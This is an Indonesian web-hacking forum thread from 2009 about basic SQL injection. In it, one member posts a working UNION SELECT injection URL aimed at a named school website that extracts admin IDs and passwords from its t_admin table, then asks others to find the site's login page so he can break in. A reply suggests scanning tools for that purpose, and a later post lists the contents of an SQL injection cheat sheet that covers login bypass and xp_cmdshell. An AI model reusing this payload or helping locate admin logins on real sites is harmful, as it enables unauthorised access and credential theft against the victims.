TEknIk MEndasar Sql Injection Season 1

Forum untuk membahas semua tentang web hacking mulai dari footprint, scanning, gain access, escalate previlege, exploit,cover track, backdoors sampai mengamankan web

Moderators: Paman, Xshadow, indounderground, NeOS-01

Forum rules
Membahas bugs,penetrasi, eksploitasi dan teknik mengamankan website - websrver. Sertakan POC disini agar member dapat mempelajarinya
User avatar
oki_machine
Posts: 55
Joined: Sun Feb 08, 2009 10:09 pm
Location: root@oki_machine-oki # _
Contact:

Re: TEknIk MEndasar Sql Injection Season 1

Post by oki_machine » Sat Jul 04, 2009 9:28 pm

ijin nyobain kak!
:D :D :D :D :D

User avatar
vodork
Posts: 191
Joined: Wed Jun 10, 2009 1:52 am
Location: jogja/sarkem
Contact:

Re: TEknIk MEndasar Sql Injection Season 1

Post by vodork » Sat Jul 11, 2009 1:00 pm

numpang corat coret di siani ya om :D :D
daripada bikin tpik baru malah nyampah :D

Code: Select all

http://www.sman1karangnongko-klt.sch.id/berita.php?ID=-31+union+all+select+1,2,3,group_concat(fs_id,0x3a,fs_password,0x3a,fs_kat),5,6,7,8,9,10+from+t_admin--
belum nemu'n halaman loginnya :roll: :roll:
udah tak ubek2 gak nemu'n juga :lol: :lol:
ada yang bisa?
mohon bimbinganya....
aku masih newbie...
thax b4...
.::[tresno jalaran saking kulino]::.

.::[nek wes kullino]::.

.::[karepmu]::.

tukangtidurterus
Posts: 1
Joined: Mon Sep 08, 2008 3:38 am
Location: samarinda, KALTIMfree
Contact:

Re: TEknIk MEndasar Sql Injection Season 1

Post by tukangtidurterus » Sat Jul 11, 2009 8:14 pm

maknyos tuttsnya :D

User avatar
adi0ranye
Posts: 6
Joined: Sun Dec 28, 2008 7:51 pm

Re: TEknIk MEndasar Sql Injection Season 1

Post by adi0ranye » Sun Jul 12, 2009 8:34 am

vodork wrote:numpang corat coret di siani ya om :D :D
daripada bikin tpik baru malah nyampah :D

Code: Select all

http://www.sman1karangnongko-klt.sch.id/berita.php?ID=-31+union+all+select+1,2,3,group_concat(fs_id,0x3a,fs_password,0x3a,fs_kat),5,6,7,8,9,10+from+t_admin--
belum nemu'n halaman loginnya :roll: :roll:
udah tak ubek2 gak nemu'n juga :lol: :lol:
ada yang bisa?
mohon bimbinganya....
aku masih newbie...
thax b4...
Coba pake nikto atau acunetix bro cara cari login pagenya...

User avatar
vodork
Posts: 191
Joined: Wed Jun 10, 2009 1:52 am
Location: jogja/sarkem
Contact:

Re: TEknIk MEndasar Sql Injection Season 1

Post by vodork » Mon Jul 13, 2009 2:17 pm

Ok ok'
thx langsung menuju sasaran
.::[tresno jalaran saking kulino]::.

.::[nek wes kullino]::.

.::[karepmu]::.

User avatar
r-newbie
Posts: 5
Joined: Thu Jan 10, 2008 4:49 am
Location: SEMARANG
Contact:

Re: TEknIk MEndasar Sql Injection Season 1

Post by r-newbie » Mon Jul 13, 2009 2:20 pm

ane dah pake linux, jalanin perl-nya gimana bro? sori nubie :oops:
Learning Newbie

User avatar
vodork
Posts: 191
Joined: Wed Jun 10, 2009 1:52 am
Location: jogja/sarkem
Contact:

Re: TEknIk MEndasar Sql Injection Season 1

Post by vodork » Wed Jul 15, 2009 12:30 am

udah tak dunlud om tapi cara makenya rumit banget :roll: :roll:
maklum newbie
bisa tolong cari'n halaman loginx gak :D :D
.::[tresno jalaran saking kulino]::.

.::[nek wes kullino]::.

.::[karepmu]::.

zienuxer
Posts: 4
Joined: Tue Aug 18, 2009 7:48 am

Re: TEknIk MEndasar Sql Injection Season 1

Post by zienuxer » Tue Aug 18, 2009 4:45 pm

wah aq masih bingung neh..nyimak aj dulu kali :mrgreen: :mrgreen:

User avatar
Gumux_1107
Posts: 102
Joined: Wed Dec 19, 2007 1:41 pm
Location: Infront of My Computer
Contact:

SQL Injection Cheat Sheet

Post by Gumux_1107 » Mon Aug 24, 2009 12:34 am

Berhubung aku tadi dapet pas mau latian SQL inject (maklum, belom pernah slesei latian sql inject gara2 takut :D), dapat ini :D Karna aku juga lagi ngg enak bikin tread baru yang malah nambah server tambah penuh, mendingan aku taruh disini aj :D

Code: Select all

[size=150][b]Table Of Contents[/b][/size]

   1. About SQL Injection Cheat Sheet
   2. Syntax Reference, Sample Attacks and Dirty SQL Injection Tricks
         1. Line Comments
                * SQL Injection Attack Samples
         2. Inline Comments
                * Classical Inline Comment SQL Injection Attack Samples
                * MySQL Version Detection Sample Attacks
         3. Stacking Queries
                * Language / Database Stacked Query Support Table
                * About MySQL and PHP
                * Stacked SQL Injection Attack Samples
         4. If Statements
                * MySQL If Statement
                * SQL Server If Statement
                * If Statement SQL Injection Attack Samples
         5. Using Integers
         6. String  Operations
                * String Concatenation
         7. Strings without Quotes
                * Hex based SQL Injection Samples
         8. String Modification & Related
         9. Union Injections
                * UNION – Fixing Language Issues
        10. Bypassing Login Screens
        11. Enabling xp_cmdshell in SQL Server 2005
        12. Other parts are not so well formatted but check out by yourself, drafts, notes and stuff, scroll down and see.
Url: http://ferruh.mavituna.com/sql-injectio ... sheet-oku/
________________________________________________________________________________
SYNTAX ERROR

Post Reply

Return to “Web Hacking”